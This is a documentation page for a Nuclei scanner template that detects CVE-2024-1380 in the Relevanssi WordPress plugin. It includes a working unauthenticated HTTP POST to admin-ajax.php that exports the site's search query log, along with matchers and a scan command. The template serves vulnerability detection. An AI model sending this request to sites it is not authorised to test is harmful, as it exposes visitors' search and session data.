Skip to content
Nuclei Templates

Relevanssi (A Better Search) <= 4.22.0 - Query Log Export

ID: CVE-2024-1380

Severity: medium

Author: FLX

Tags: cve,cve2024,wp,wordpress,wp-plugin,relevanssi,exposure

Description

Section titled “Description”

The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data.

YAML Source

Section titled “YAML Source”
id: CVE-2024-1380


info:
  name: Relevanssi (A Better Search) <= 4.22.0 - Query Log Export
  author: FLX
  severity: medium
  description: |
    The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data.
  remediation: Fixed in 4.22.1
  reference:
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail=
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1380
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-1380
    epss-score: 0.00043
    epss-percentile: 0.0866
    cpe: cpe:2.3:a:relevanssi:relevanssi:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: "/wp-content/plugins/relevanssi/"
    product: relevanssi
    vendor: relevanssi
  tags: cve,cve2024,wp,wordpress,wp-plugin,relevanssi,exposure


http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8


        action=&relevanssi_export=1


    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(header, "filename=relevanssi_log.csv", "application/download")'
          - 'contains_all(body, "user_id", "session_id")'
        condition: and
# digest: 4a0a0047304502206670daefbc3824b9d1f15e44e2e2378d4216ff1af40528eaba3db1920eabf467022100d67bb29efe0d2a9c35d6257c33112257b644765ba0dfe74f18a8c9e5c154f5bb:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-1380.yaml"

View on Github